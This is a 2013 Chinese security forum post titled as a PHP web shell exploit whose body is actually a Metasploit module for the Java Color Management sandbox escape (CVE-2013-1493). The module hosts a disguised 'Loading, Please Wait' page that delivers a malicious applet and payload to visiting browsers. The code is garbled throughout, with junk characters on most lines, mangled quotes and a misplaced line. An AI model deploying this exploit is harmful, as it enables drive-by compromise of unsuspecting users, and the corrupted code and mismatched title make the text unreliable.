找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2290|回复: 0
打印 上一主题 下一主题

STUNSHELL PHP Web Shell远程执行代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:31:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
##; w: {) q* h/ X  H1 F
8 M% }3 N% ^) A  H4 S* X: {
# This file is part of the Metasploit Framework and may be subject to9 P6 e# Y( S) z9 g. O
# redistribution and commercial restrictions. Please see the Metasploit
1 k* \" `: `7 j  W% H& E1 n: u# web site for more information on licensing and terms of use.
0 p. |% h' T/ h4 A9 @# W+ H# http://metasploit.com/
4 C, g3 P/ r5 y- G4 W: ~$ Z' ~##
: C. n$ Z3 {6 b2 Arequire ‘msf/core’6 w) _9 _; z3 H) G! i
require ‘rex’
# W; E7 V8 A+ |( p- z7 _( ?; gclass Metasploit3 < Msf::Exploit::Remote" _6 F9 R% t: t6 z; t
Rank = NormalRanking, r/ m- i( ~; a* v; B  C' j
include Msf::Exploit::Remote::HttpServer::HTML8 m7 ^5 X0 C8 t% n: u
include Msf::Exploit::EXE9 U$ j3 d9 u. F
include Msf::Exploit::Remote::BrowserAutopwn* B: Y2 o+ }! \+ W1 S; n
autopwn_info({ :javascript => false })
( o4 e! D& x8 Udef initialize( info = {} )
  h5 x  Y  M  m9 G5 h0 ?  X6 msuper( update_info( info,6 d8 Z8 d/ o4 v; q* Y5 H) u) _
‘Name’ => ‘Java CMM Remote Code Execution’,
) w( B" d0 h6 _0 \. s( w  \! v‘Description’ => %q{
* ~- w6 s1 ~5 n; n7 h9 u' dThis module abuses the Color Management classes from a Java Applet to run
: \2 F& z% f  g7 G1 a$ s3 Sarbitrary Java code outside of the sandbox as exploited in the wild in February3 w5 z# }$ |/ D1 Q/ G
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
: J( ?( h8 o" k; j) |& a; kand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
* {6 Y% J* a8 n+ bsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java. z1 C8 e# P( p8 N5 e
warning in order to run the malicious applet.8 [  T- h3 ]9 l( s$ `8 H1 u
},
7 K% o% w% o0 q& D9 Z1 j" \) [2 c/ K‘License’ => MSF_LICENSE,% o) Q) H- |: _
‘Author’ =>4 O4 T8 t, u1 i
'Unknown', # Vulnerability discovery and Exploit/ f& M0 z* e" O  b
'juan vazquez' # Metasploit module (just ported the published exploit)0 @1 {# T' y/ ~2 v" A
],8 L/ m( X3 L; p
‘References’ =>
9 d* U5 _& I2 [% W[8 n' [, H7 z& E; \; S* e
[ 'CVE', '2013-1493' ],
7 F9 ~. a, l+ f" x  y[ 'OSVDB', '90737' ]," Z3 K! D# N3 L9 H
[ 'BID', '58238' ],
/ q$ N! r& g# G6 T' r# b6 b[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],8 ]* E$ l, C$ j. a8 @8 F
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],  @. k2 W+ z% e" A* P
[ 'URL', 'http://pastie.org/pastes/6581034' ]
, g( `7 O# v2 b/ c% u' ]],. U: Z) A9 f: G5 v" ]9 W
‘Platform’ => [ 'win', 'java' ],5 A1 p* L+ _( e7 d8 X+ t
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },% F. e8 s. I9 @# f
‘Targets’ =>5 J* `- q7 ]$ o2 C# r
[1 `: _" e1 n/ z2 m3 J$ ]
[ 'Generic (Java Payload)',. A, l2 S% @2 S+ |
{
: T2 {: K4 G. L0 k/ p/ X2 {0 c'Platform' => 'java'," Z( [6 F$ a+ S& p: \$ [8 Q5 S
'Arch' => ARCH_JAVA
. B/ c: R" o7 S: C5 Y}! h9 q1 N+ ]( g1 {0 `# @8 R
],
/ m& X  z' d7 t9 V4 W. I[ 'Windows x86 (Native Payload)',8 D9 ]) [- U7 m) x' y" z7 d
{
+ ~  h! R; O6 |# C. u) _0 M  x' o6 G'Platform' => 'win',
, v% \: n3 T, b3 S! B'Arch' => ARCH_X86
, |! [' ?2 |" v: l$ i  R}
* E* z( ~) x$ ?) T]
$ H' p3 v0 L- N2 x  ~  T$ I],
: q% `# m0 Z2 ]% Q/ Z, m5 n; r5 R‘‘DisclosureDate’ => ‘Mar 01 2013′
2 H/ k: B9 r# x( Z; ]& I; k))
& e4 L" d6 |# ]/ h3 Jend2 R% U8 J2 t% ?, H
def setup6 o) b( ?5 W" Y
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)& K/ \" w8 G' ?6 q7 g+ P3 F" \
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 A$ U7 s1 w0 c, B* v' ]$ N, npath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
: _! x, \. i$ K@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }6 w! O  @0 {) x" U! R
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
6 e7 Z3 f2 u! F  \4 o6 |@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% k; |3 p, k/ S0 p+ |% D/ q' \" P8 Npath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)7 n1 L. v/ ]* r. F" L
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
1 n! x9 @$ i' g8 o@init_class_name = rand_text_alpha(“Init”.length)
/ {! I" t7 i% [, ^! J@init_class.gsub!(“Init”, @init_class_name)
( K: u7 U3 T$ psuper
, Q) y; a+ T, R4 D5 E1 Vend
( [; t2 L5 x8 ?6 q4 v( S; S% t+ A! [. y; Xdef on_request_uri(cli, request)$ u; q: _7 s! h% W
print_status(“handling request for #{request.uri}”)3 v: e! A+ Z& C( g; n
case request.uri
( b" v6 e2 G% H4 b3 K& h: r5 \when /\.jar$/i) X2 C* h- b, k: Q
jar = payload.encoded_jar3 L) v: k+ Y- E% e5 o6 F- I1 W* ^
jar.add_file(“#{@init_class_name}.class”, @init_class)0 ~/ p2 c; y( h0 G2 j8 Z/ N
jar.add_file(“Leak.class”, @leak_class)7 ?; l& M' D  F% E( J
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
* X9 u5 g* `3 ]) ?0 N& vjar.add_file(“MyColorSpace.class”, @color_space_class)
. ?1 u6 ~* D* m9 IDefaultTarget’ => 1,
3 X5 R" x6 E& P5 C3 d; z/ rmetasploit_str = rand_text_alpha(“metasploit”.length)! _6 Q( M2 z. M% s
payload_str = rand_text_alpha(“payload”.length)
6 E8 o3 G/ p3 }" \$ h0 _7 rjar.entries.each { |entry|0 n' N' n, [2 m; P0 ~" V8 G
entry.name.gsub!(“metasploit”, metasploit_str)4 a5 x% c! d; }& s& y2 P# n0 v
entry.name.gsub!(“Payload”, payload_str)
  E; d! f2 p/ X& d6 ~entry.data = entry.data.gsub(“metasploit”, metasploit_str)
) q' j8 f- D- a8 R2 }8 Q- oentry.data = entry.data.gsub(“Payload”, payload_str)
  }( X% l9 Z# G% C# [0 P9 e/ h# v}
+ w, f( b/ t' O3 m, ejar.build_manifest6 i! X( a# L# t( y
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
2 v: ^  ^5 [% u% v- }# G% t9 qwhen /\/$/
. u+ X& X7 y8 w3 U* i9 G4 s$ Spayload = regenerate_payload(cli): R* }9 B4 u2 g2 ]8 J+ ?
if not payload# Y; n1 x0 E" W* V8 Y8 |
print_error(“Failed to generate the payload.”)# g. ?" `* ]2 u/ A, o9 v: F
send_not_found(cli)
; U' D2 N4 G: J! `return7 @2 R4 i+ [8 `1 J( |
end( ?% I1 x; ^8 ]% f
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })7 Z6 A5 K8 E/ K- v/ c+ E# @; Q
else. K( ^( L' Y6 x/ Z$ }2 V2 I! `# f% `
send_redirect(cli, get_resource() + ‘/’, ”)
& @8 p1 z7 F# o9 y2 r% zend4 Z0 T8 K  T# }5 |2 F7 J  A& N
end6 P4 {& j5 ~6 H, E9 R: Z
def generate_html
  ]& I4 X2 [  Y: S- Y! ?html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
; Y. |7 t3 T; Y, ]9 ]/ \8 khtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
5 b9 L/ M: j+ y0 D8 h  \  a1 ^, ohtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
4 D, ]  r& A6 L2 g( F+ Chtml += %Q|</applet></body></html>|1 T% d; f" k. g3 C: l; g" ~
return html
- y- U! R1 ]1 m. F! lend8 Z2 [( e6 T3 [1 W3 k/ ?1 P5 q
end" D- e0 b$ L$ a2 S8 V7 X9 U, M
end# a: Y6 P# L* d! g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表